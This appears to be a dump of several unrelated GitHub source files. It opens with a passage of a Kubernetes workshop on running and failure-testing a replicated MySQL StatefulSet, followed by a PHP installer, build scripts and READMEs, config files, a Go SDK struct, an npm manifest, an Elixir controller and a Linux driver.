mysql 3 3 2m
mysql 3 3 3m
In a different terminal window, wou can watch the progress of pods creation using the following command:
$ kubectl get pods -l app=mysql --watch
NAME READY STATUS RESTARTS AGE
mysql-0 0/2 Init:0/2 0 30s
mysql-0 0/2 Init:1/2 0 35s
mysql-0 0/2 PodInitializing 0 47s
mysql-0 1/2 Running 0 48s
mysql-0 2/2 Running 0 59s
mysql-1 0/2 Pending 0 0s
mysql-1 0/2 Pending 0 0s
mysql-1 0/2 Pending 0 0s
mysql-1 0/2 Init:0/2 0 0s
mysql-1 0/2 Init:1/2 0 35s
mysql-1 0/2 Init:1/2 0 45s
mysql-1 0/2 PodInitializing 0 54s
mysql-1 1/2 Running 0 55s
mysql-1 2/2 Running 0 1m
mysql-2 0/2 Pending 0 <invalid>
mysql-2 0/2 Pending 0 <invalid>
mysql-2 0/2 Pending 0 0s
mysql-2 0/2 Init:0/2 0 0s
mysql-2 0/2 Init:1/2 0 32s
mysql-2 0/2 Init:1/2 0 43s
mysql-2 0/2 PodInitializing 0 50s
mysql-2 1/2 Running 0 52s
mysql-2 2/2 Running 0 56s
Press `Ctrl`+`C` to stop watching. If you notice, the pods are initialized in an orderly fashion in their
startup process. The reason being StatefulSet controller assigns a unique, stable name (`mysql-0`,
`mysql-1`, `mysql-2`) with `mysql-0` being the master and others being slaves. The configuration uses https://www.percona.com/software/mysql-database/percona-xtrabackup[Percona
Xtrabackup] (open-source tool) to clone source MySQL server to its slaves.
== Test MySQL setup
You can use `mysql-client` to send some data to the master (`mysql-0.mysql`)
```
kubectl run mysql-client --image=mysql:5.7 -i --rm --restart=Never --\
mysql -h mysql-0.mysql <<EOF
CREATE DATABASE test;
CREATE TABLE test.messages (message VARCHAR(250));
INSERT INTO test.messages VALUES ('hello, from mysql-client');
EOF
```
You can run the following to test if slaves (`mysql-read`) received the data
```
$ kubectl run mysql-client --image=mysql:5.7 -it --rm --restart=Never --\
mysql -h mysql-read -e "SELECT * FROM test.messages"
```
This should display an output like this:
```
+--------------------------+
| message |
+--------------------------+
| hello, from mysql-client |
+--------------------------+
```
To test load balancing across slaves, you can run the following command:
kubectl run mysql-client-loop --image=mysql:5.7 -i -t --rm --restart=Never --\
bash -ic "while sleep 1; do mysql -h mysql-read -e 'SELECT @@server_id,NOW()'; done"
Each MySQL instance is assigned a unique identifier, and it can be retrieved using `@@server_id`. This command prints the server id serving the request and the timestamp in an infinite loop.
This command will show the output:
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:01:11 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:01:12 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 102 | 2017-10-24 03:01:13 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 101 | 2017-10-24 03:01:14 |
+-------------+---------------------+
You can leave this open in a separate window while you run failure modes in the next section.
Alternatively, you can use `Ctrl`+`C` to terminate the loop.
== Testing failure modes
We will see how StatefulSet behave in different failure modes. The following modes will be tested:
. Unhealthy container
. Failed pod
. Failed node
=== Unhealthy container
MySQL container uses readiness probe by running `mysql -h 127.0.0.1 -e 'SELECT 1'` on the server to make sure MySQL server is still active.
Run this command to simulate MySQL as being unresponsive:
kubectl exec mysql-2 -c mysql -- mv /usr/bin/mysql /usr/bin/mysql.off
This command renames the `/usr/bin/mysql` command so that readiness probe cannot find it. After a few seconds, during the next health check, the Pod should report one of its containers is not healthy. This can be verified using the command:
kubectl get pod mysql-2
NAME READY STATUS RESTARTS AGE
mysql-2 1/2 Running 0 12m
`mysql-read` load balancer detects failures like this and takes action by not sending traffic to failed containers. You can check this if you have the loop running in separate window. The loop shows the following output:
```
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 101 | 2017-10-24 03:17:09 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 101 | 2017-10-24 03:17:10 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:17:11 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:17:12 |
+-------------+---------------------+
```
Revert back to its initial state
kubectl exec mysql-2 -c mysql -- mv /usr/bin/mysql.off /usr/bin/mysql
Check the status again to see that both the pods are running and healthy:
$ kubectl get pod -w mysql-2
NAME READY STATUS RESTARTS AGE
mysql-2 2/2 Running 0 5h
And the loop is now also showing all three servers.
=== Failed pod
To simulate a failed pod, you can delete a pod as shown:
kubectl delete pod mysql-2
pod "mysql-2" deleted
StatefulSet controller recognizes failed pods and creates a new one with same name and link to the same
PersistentVolumeClaim.
$ kubectl get pod -w mysql-2
NAME READY STATUS RESTARTS AGE
mysql-2 0/2 Init:0/2 0 28s
mysql-2 0/2 Init:1/2 0 31s
mysql-2 0/2 PodInitializing 0 32s
mysql-2 1/2 Running 0 33s
mysql-2 2/2 Running 0 37s
=== Failed node
Kubernetes allows a node to be marked unschedulable using the `kubectl drain` command. This prevents any new pods to be scheduled on this node. If the API server supports eviction, then it will evict the pods. Otherwise, it will delete all the pods. The evict and delete happens for all the pods except mirror pods (which cannot be deleted through API server). Read more about drain at https://kubernetes.io/docs/tasks/administer-cluster/safely-drain-node/.
You can simulate node downtime by draining the node. In order to determine which node to drain, run
this command
$ kubectl get pod mysql-2 -o wide
NAME READY STATUS RESTARTS AGE IP NODE
mysql-2 2/2 Running 0 11m 100.96.6.12 ip-172-20-64-152.ec2.internal
Drain the node using the command:
$ kubectl drain ip-172-20-64-152.ec2.internal --force --delete-local-data --ignore-daemonsets
node "ip-172-20-64-152.ec2.internal" cordoned
WARNING: Deleting pods with local storage: mysql-2; Deleting pods not managed by ReplicationController, ReplicaSet, Job, DaemonSet or StatefulSet: kube-proxy-ip-172-20-64-152.ec2.internal
pod "kube-dns-479524115-76s6j" evicted
pod "mysql-2" evicted
node "ip-172-20-64-152.ec2.internal" drained
You can look at the list of nodes:
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
ip-172-20-107-81.ec2.internal Ready node 10h v1.7.4
ip-172-20-122-243.ec2.internal Ready master 10h v1.7.4
ip-172-20-125-181.ec2.internal Ready node 10h v1.7.4
ip-172-20-37-239.ec2.internal Ready master 10h v1.7.4
ip-172-20-52-200.ec2.internal Ready node 10h v1.7.4
ip-172-20-57-5.ec2.internal Ready node 10h v1.7.4
ip-172-20-64-152.ec2.internal Ready,SchedulingDisabled node 10h v1.7.4
ip-172-20-76-117.ec2.internal Ready master 10h v1.7.4
Notice how scheduling is disabled on one node.
Now you can watch Pod reschedules
kubectl get pod mysql-2 -o wide --watch
The output always stay at:
NAME READY STATUS RESTARTS AGE IP NODE
mysql-2 0/2 Pending 0 33s <none> <none>
This could be a bug in StatefulSet as the pod was failing to reschedule. The reason was, there was no other nodes running in the AZ where the original node failed. The EBS volume was failing to to attach to other nodes because of different AZ restriction.
To mitigate this issue, manually scale the nodes to 6 which resulted in an additional node being available in that AZ.
Your scenario could be different and may not need this step.
Edit number of nodes to `6` if you run into `Pending` issue:
kops edit ig nodes
Change the specification to:
spec:
image: kope.io/k8s-1.7-debian-jessie-amd64-hvm-ebs-2017-07-28
machineType: t2.medium
maxSize: 6
minSize: 6
role: Node
subnets:
- us-east-1a
- us-east-1b
- us-east-1c
Review and commit changes:
kops update cluster --yes
It takes a few minutes for a new node to be provisioned. This can be verified using the command shown:
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
ip-172-20-107-81.ec2.internal Ready node 10h v1.7.4
ip-172-20-122-243.ec2.internal Ready master 10h v1.7.4
ip-172-20-125-181.ec2.internal Ready node 10h v1.7.4
ip-172-20-37-239.ec2.internal Ready master 10h v1.7.4
ip-172-20-52-200.ec2.internal Ready node 10h v1.7.4
ip-172-20-57-5.ec2.internal Ready node 10h v1.7.4
ip-172-20-64-152.ec2.internal Ready,SchedulingDisabled node 10h v1.7.4
ip-172-20-73-181.ec2.internal Ready node 1m v1.7.4
ip-172-20-76-117.ec2.internal Ready master 10h v1.7.4
Now you can watch the status of the pod:
$ kubectl get pod mysql-2 -o wide
NAME READY STATUS RESTARTS AGE IP NODE
mysql-2 2/2 Running 0 11m 100.96.8.2 ip-172-20-73-181.ec2.internal
Let's put the previous node back into normal state:
$ kubectl uncordon ip-172-20-64-152.ec2.internal
node "ip-10-10-71-96.ec2.internal" uncordoned
The list of nodes is now shown as:
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
ip-172-20-107-81.ec2.internal Ready node 10h v1.7.4
ip-172-20-122-243.ec2.internal Ready master 10h v1.7.4
ip-172-20-125-181.ec2.internal Ready node 10h v1.7.4
ip-172-20-37-239.ec2.internal Ready master 10h v1.7.4
ip-172-20-52-200.ec2.internal Ready node 10h v1.7.4
ip-172-20-57-5.ec2.internal Ready node 10h v1.7.4
ip-172-20-64-152.ec2.internal Ready node 10h v1.7.4
ip-172-20-73-181.ec2.internal Ready node 3m v1.7.4
ip-172-20-76-117.ec2.internal Ready master 10h v1.7.4
== Scaling slaves
More slaves can be added to the MySQL cluster to increase the read query capacity. This can be done using the command shown:
$ kubectl scale statefulset mysql --replicas=5
statefulset "mysql" scaled
Of course, you can watch the progress of scaling
kubectl get pods -l app=mysql -w
It shows the output:
$ kubectl get pods -l app=mysql -w
NAME READY STATUS RESTARTS AGE
mysql-0 2/2 Running 0 6h
mysql-1 2/2 Running 0 6h
mysql-2 2/2 Running 0 16m
mysql-3 0/2 Init:0/2 0 1s
mysql-3 0/2 Init:1/2 0 18s
mysql-3 0/2 Init:1/2 0 28s
mysql-3 0/2 PodInitializing 0 36s
mysql-3 1/2 Running 0 37s
mysql-3 2/2 Running 0 43s
mysql-4 0/2 Pending 0 <invalid>
mysql-4 0/2 Pending 0 <invalid>
mysql-4 0/2 Pending 0 0s
mysql-4 0/2 Init:0/2 0 0s
mysql-4 0/2 Init:1/2 0 31s
mysql-4 0/2 Init:1/2 0 41s
mysql-4 0/2 PodInitializing 0 52s
mysql-4 1/2 Running 0 53s
mysql-4 2/2 Running 0 58s
If the loop is still running, then it will print an output as shown:
+-------------+---------------------+
| 101 | 2017-10-24 03:53:53 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 100 | 2017-10-24 03:53:54 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 102 | 2017-10-24 03:53:55 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 103 | 2017-10-24 03:53:57 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 103 | 2017-10-24 03:53:58 |
+-------------+---------------------+
+-------------+---------------------+
| @@server_id | NOW() |
+-------------+---------------------+
| 104 | 2017-10-24 03:53:59 |
+-------------+---------------------+
You can also verify if the slaves have the same data set:
kubectl run mysql-client --image=mysql:5.7 -i -t --rm --restart=Never --\
mysql -h mysql-3.mysql -e "SELECT * FROM test.messages"
It still shows the same result:
+--------------------------+
| message |
+--------------------------+
| hello, from mysql-client |
+--------------------------+
You can scale down by using the command shown:
kubectl scale statefulset mysql --replicas=3
statefulset "mysql" scaled
Note that, scale in doesn't delete the data or PVCs attached to the pods. You have to delete
them manually
kubectl delete pvc data-mysql-3
kubectl delete pvc data-mysql-4
It shows the output:
persistentvolumeclaim "data-mysql-3" deleted
persistentvolumeclaim "data-mysql-4" deleted
== Cleaning up
First delete the StatefulSet. This also terminates the pods:
$ kubectl delete statefulset mysql
statefulset "mysql" deleted
Verify there are no more pods running:
kubectl get pods -l app=mysql
It shows the output:
No resources found.
Delete ConfigMap, Service, PVC using the command:
$ kubectl delete configmap,service,pvc -l app=mysql
configmap "mysql-config" deleted
service "mysql" deleted
service "mysql-read" deleted
persistentvolumeclaim "data-mysql-0" deleted
persistentvolumeclaim "data-mysql-1" deleted
persistentvolumeclaim "data-mysql-2" deleted
You are now ready to continue on with the workshop!
:frame: none
:grid: none
:valign: top
[align="center", cols="1", grid="none", frame="none"]
|=====
|image:button-continue-developer.png[link=../../03-path-application-development/308-cicd-workflows/]
|link:../../developer-path.adoc[Go to Developer Index]
|=====
| {
"pile_set_name": "Github"
} |
<?php
$installer = $this;
/* @var $installer Mage_Core_Model_Resource_Setup */
$installer->startSetup();
$tableName = $installer->getTable('cron_schedule');
try {
$installer->getConnection()->dropColumn($tableName, 'parameters');
} catch (Exception $e) {
// ignored intentionally
}
$installer->getConnection()->addColumn(
$tableName,
'parameters',
"TEXT NULL COMMENT 'Serialized Parameters'"
);
$installer->getConnection()->addColumn(
$tableName,
'eta',
"timestamp NULL DEFAULT NULL COMMENT 'Estimated Time of Arrival'"
);
$installer->getConnection()->addColumn(
$tableName,
'host',
"varchar(255) NULL COMMENT 'Host running this job'"
);
$installer->getConnection()->addColumn(
$tableName,
'pid',
"varchar(255) NULL COMMENT 'Process id of this job'"
);
$installer->getConnection()->addColumn(
$tableName,
'progress_message',
"TEXT NULL COMMENT 'Progress message'"
);
$installer->endSetup();
| {
"pile_set_name": "Github"
} |
Build and Run
=============
To build this very simple example, do something like this::
gfortran -c fortmyfunc.f90
gcc -c -std=c++11 myfunc.cpp
gfortran fortmyfunc.o myfunc.o -o main -lstdc++
main
The``-lstdc++`` is required to link in the c++ standard libraries
Running ``main`` should yield something like::
1
42.000000000000000
0.0000000000000000
1.0000000000000000
2.0000000000000000
3.0000000000000000
4.0000000000000000
5.0000000000000000
6.0000000000000000
7.0000000000000000
8.0000000000000000
9.0000000000000000
10.000000000000000
11.000000000000000
12.000000000000000
13.000000000000000
14.000000000000000
15.000000000000000
16.000000000000000
17.000000000000000
18.000000000000000
19.000000000000000
Compiling on Windows
====================
At the moment, the most reliable mixed compilation seems to be using the mingw-provided gfortran/gcc combination from mingw-get. These are the versions used as of June 20, 2014::
>gfortran --version
GNU Fortran (GCC) 4.8.1
Copyright (C) 2013 Free Software Foundation, Inc.
>gcc --version
gcc (GCC) 4.8.1
Copyright (C) 2013 Free Software Foundation, Inc.
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 056578f2a60aa3f47a4459fdb1c7241c
timeCreated: 1433733466
licenseType: Store
NativeFormatImporter:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
# ORE - Objects Raid Engine (libore.ko)
#
# Note ORE needs to "select ASYNC_XOR". So Not to force multiple selects
# for every ORE user we do it like this. Any user should add itself here
# at the "depends on EXOFS_FS || ..." with an ||. The dependencies are
# selected here, and we default to "ON". So in effect it is like been
# selected by any of the users.
config ORE
tristate
depends on EXOFS_FS || PNFS_OBJLAYOUT
select ASYNC_XOR
select RAID6_PQ
select ASYNC_PQ
default SCSI_OSD_ULD
| {
"pile_set_name": "Github"
} |
#/bin/sh
#
# Used to compile a jar with instrumented versions of certain classes.
#
set -e
run () {
echo "% $@"
"$@"
}
if [ $# -ne 1 ]
then
echo "Must provide build dir ('target' or 'build')."
exit 1
fi
scriptDir=$(cd $(dirname $0) && pwd)
TOPDIR="$scriptDir/../.."
RUNTIME="$TOPDIR/src/library/scala/runtime"
SOURCES="$RUNTIME/BoxesRunTime.java $RUNTIME/ScalaRunTime.scala"
SCALAC=$TOPDIR/$1/pack/bin/scalac
SRC_DIR="$scriptDir/library/scala/runtime"
SCALALIB=$TOPDIR/$1/pack/lib/scala-library.jar
CLASSDIR="$scriptDir/classes"
ARTIFACT=instrumented.jar
DESTINATION="$TOPDIR/test/files/speclib"
[[ -x "$SCALAC" ]] || exit 1;
# compile it
run rm -rf $CLASSDIR && mkdir $CLASSDIR
run cp $SOURCES $SRC_DIR
( cd $SRC_DIR && run patch BoxesRunTime.java $scriptDir/boxes.patch && run patch ScalaRunTime.scala $scriptDir/srt.patch )
ORIG=$(find $SRC_DIR -name '*.orig')
[[ -z "$ORIG" ]] || rm -f $ORIG
JSOURCES=$(find $SRC_DIR -name "*.java" -print)
SOURCES=$(find $SRC_DIR -type f -print)
# echo $SOURCES
run $SCALAC -d $CLASSDIR $SOURCES
run javac -cp $SCALALIB -d $CLASSDIR $JSOURCES
# jar it up
run cd $CLASSDIR
run jar cf $ARTIFACT .
run mv -f $ARTIFACT "$DESTINATION"
echo "$(cd "$DESTINATION" && pwd)/$ARTIFACT has been created." | {
"pile_set_name": "Github"
} |
package ons
//Licensed under the Apache License, Version 2.0 (the "License");
//you may not use this file except in compliance with the License.
//You may obtain a copy of the License at
//
//http://www.apache.org/licenses/LICENSE-2.0
//
//Unless required by applicable law or agreed to in writing, software
//distributed under the License is distributed on an "AS IS" BASIS,
//WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//See the License for the specific language governing permissions and
//limitations under the License.
//
// Code generated by Alibaba Cloud SDK Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
// DataInOnsMqttGroupIdList is a nested struct in ons response
type DataInOnsMqttGroupIdList struct {
MqttGroupIdDo []MqttGroupIdDo `json:"MqttGroupIdDo" xml:"MqttGroupIdDo"`
}
| {
"pile_set_name": "Github"
} |
{
"author": {
"name": "Felix Geisendörfer",
"email": "[email protected]",
"url": "http://debuggable.com/"
},
"name": "combined-stream",
"description": "A stream that emits multiple other streams one after another.",
"version": "1.0.5",
"homepage": "https://github.com/felixge/node-combined-stream",
"repository": {
"type": "git",
"url": "git://github.com/felixge/node-combined-stream.git"
},
"main": "./lib/combined_stream",
"scripts": {
"test": "node test/run.js"
},
"engines": {
"node": ">= 0.8"
},
"dependencies": {
"delayed-stream": "~1.0.0"
},
"devDependencies": {
"far": "~0.0.7"
},
"license": "MIT",
"gitHead": "cfc7b815d090a109bcedb5bb0f6713148d55a6b7",
"bugs": {
"url": "https://github.com/felixge/node-combined-stream/issues"
},
"_id": "[email protected]",
"_shasum": "938370a57b4a51dea2c77c15d5c5fdf895164009",
"_from": "combined-stream@>=1.0.5 <1.1.0",
"_npmVersion": "2.10.1",
"_nodeVersion": "0.12.4",
"_npmUser": {
"name": "alexindigo",
"email": "[email protected]"
},
"dist": {
"shasum": "938370a57b4a51dea2c77c15d5c5fdf895164009",
"size": 3675,
"noattachment": false,
"key": "combined-stream/-/combined-stream-1.0.5.tgz",
"tarball": "http://registry.npm.alibaba-inc.com/combined-stream/download/combined-stream-1.0.5.tgz"
},
"maintainers": [
{
"name": "alexindigo",
"email": "[email protected]"
},
{
"name": "apechimp",
"email": "[email protected]"
},
{
"name": "celer",
"email": "[email protected]"
},
{
"name": "felixge",
"email": "[email protected]"
}
],
"directories": {},
"publish_time": 1434338357202,
"_cnpm_publish_time": 1434338357202,
"_resolved": "http://registry.npm.alibaba-inc.com/combined-stream/download/combined-stream-1.0.5.tgz",
"readme": "ERROR: No README data found!"
}
| {
"pile_set_name": "Github"
} |
# credo:disable-for-this-file
defmodule Cog do
@moduledoc false
use Bonny.Controller
require Logger
@impl true
@spec add(map()) :: :ok | :error
def add(obj), do: Logger.info("add: #{inspect(obj)}")
@impl true
@spec modify(map()) :: :ok | :error
def modify(obj), do: Logger.info("modify: #{inspect(obj)}")
@impl true
@spec delete(map()) :: :ok | :error
def delete(obj), do: Logger.info("delete: #{inspect(obj)}")
@impl true
@spec reconcile(map()) :: :ok | :error
def reconcile(obj), do: Logger.info("reconcile: #{inspect(obj)}")
end
| {
"pile_set_name": "Github"
} |
/*
* Toshiba TC6387XB support
* Copyright (c) 2005 Ian Molton
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This file contains TC6387XB base support.
*
*/
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/clk.h>
#include <linux/err.h>
#include <linux/mfd/core.h>
#include <linux/mfd/tmio.h>
#include <linux/mfd/tc6387xb.h>
enum {
TC6387XB_CELL_MMC,
};
#ifdef CONFIG_PM
static int tc6387xb_suspend(struct platform_device *dev, pm_message_t state)
{
struct clk *clk32k = platform_get_drvdata(dev);
struct tc6387xb_platform_data *pdata = dev->dev.platform_data;
if (pdata && pdata->suspend)
pdata->suspend(dev);
clk_disable(clk32k);
return 0;
}
static int tc6387xb_resume(struct platform_device *dev)
{
struct clk *clk32k = platform_get_drvdata(dev);
struct tc6387xb_platform_data *pdata = dev->dev.platform_data;
clk_enable(clk32k);
if (pdata && pdata->resume)
pdata->resume(dev);
return 0;
}
#else
#define tc6387xb_suspend NULL
#define tc6387xb_resume NULL
#endif
/*--------------------------------------------------------------------------*/
static int tc6387xb_mmc_enable(struct platform_device *mmc)
{
struct platform_device *dev = to_platform_device(mmc->dev.parent);
struct clk *clk32k = platform_get_drvdata(dev);
clk_enable(clk32k);
return 0;
}
static int tc6387xb_mmc_disable(struct platform_device *mmc)
{
struct platform_device *dev = to_platform_device(mmc->dev.parent);
struct clk *clk32k = platform_get_drvdata(dev);
clk_disable(clk32k);
return 0;
}
/*--------------------------------------------------------------------------*/
static struct tmio_mmc_data tc6387xb_mmc_data = {
.hclk = 24000000,
};
static struct resource tc6387xb_mmc_resources[] = {
{
.start = 0x800,
.end = 0x9ff,
.flags = IORESOURCE_MEM,
},
{
.start = 0x200,
.end = 0x2ff,
.flags = IORESOURCE_MEM,
},
{
.start = 0,
.end = 0,
.flags = IORESOURCE_IRQ,
},
};
static struct mfd_cell tc6387xb_cells[] = {
[TC6387XB_CELL_MMC] = {
.name = "tmio-mmc",
.enable = tc6387xb_mmc_enable,
.disable = tc6387xb_mmc_disable,
.driver_data = &tc6387xb_mmc_data,
.num_resources = ARRAY_SIZE(tc6387xb_mmc_resources),
.resources = tc6387xb_mmc_resources,
},
};
static int tc6387xb_probe(struct platform_device *dev)
{
struct tc6387xb_platform_data *pdata = dev->dev.platform_data;
struct resource *iomem;
struct clk *clk32k;
int irq, ret;
iomem = platform_get_resource(dev, IORESOURCE_MEM, 0);
if (!iomem) {
return -EINVAL;
}
ret = platform_get_irq(dev, 0);
if (ret >= 0)
irq = ret;
else
goto err_resource;
clk32k = clk_get(&dev->dev, "CLK_CK32K");
if (IS_ERR(clk32k)) {
ret = PTR_ERR(clk32k);
goto err_resource;
}
platform_set_drvdata(dev, clk32k);
if (pdata && pdata->enable)
pdata->enable(dev);
printk(KERN_INFO "Toshiba tc6387xb initialised\n");
tc6387xb_cells[TC6387XB_CELL_MMC].platform_data =
&tc6387xb_cells[TC6387XB_CELL_MMC];
tc6387xb_cells[TC6387XB_CELL_MMC].data_size =
sizeof(tc6387xb_cells[TC6387XB_CELL_MMC]);
ret = mfd_add_devices(&dev->dev, dev->id, tc6387xb_cells,
ARRAY_SIZE(tc6387xb_cells), iomem, irq);
if (!ret)
return 0;
clk_put(clk32k);
err_resource:
return ret;
}
static int tc6387xb_remove(struct platform_device *dev)
{
struct clk *clk32k = platform_get_drvdata(dev);
mfd_remove_devices(&dev->dev);
clk_disable(clk32k);
clk_put(clk32k);
platform_set_drvdata(dev, NULL);
return 0;
}
static struct platform_driver tc6387xb_platform_driver = {
.driver = {
.name = "tc6387xb",
},
.probe = tc6387xb_probe,
.remove = tc6387xb_remove,
.suspend = tc6387xb_suspend,
.resume = tc6387xb_resume,
};
static int __init tc6387xb_init(void)
{
return platform_driver_register(&tc6387xb_platform_driver);
}
static void __exit tc6387xb_exit(void)
{
platform_driver_unregister(&tc6387xb_platform_driver);
}
module_init(tc6387xb_init);
module_exit(tc6387xb_exit);
MODULE_DESCRIPTION("Toshiba TC6387XB core driver");
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR("Ian Molton");
MODULE_ALIAS("platform:tc6387xb");
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.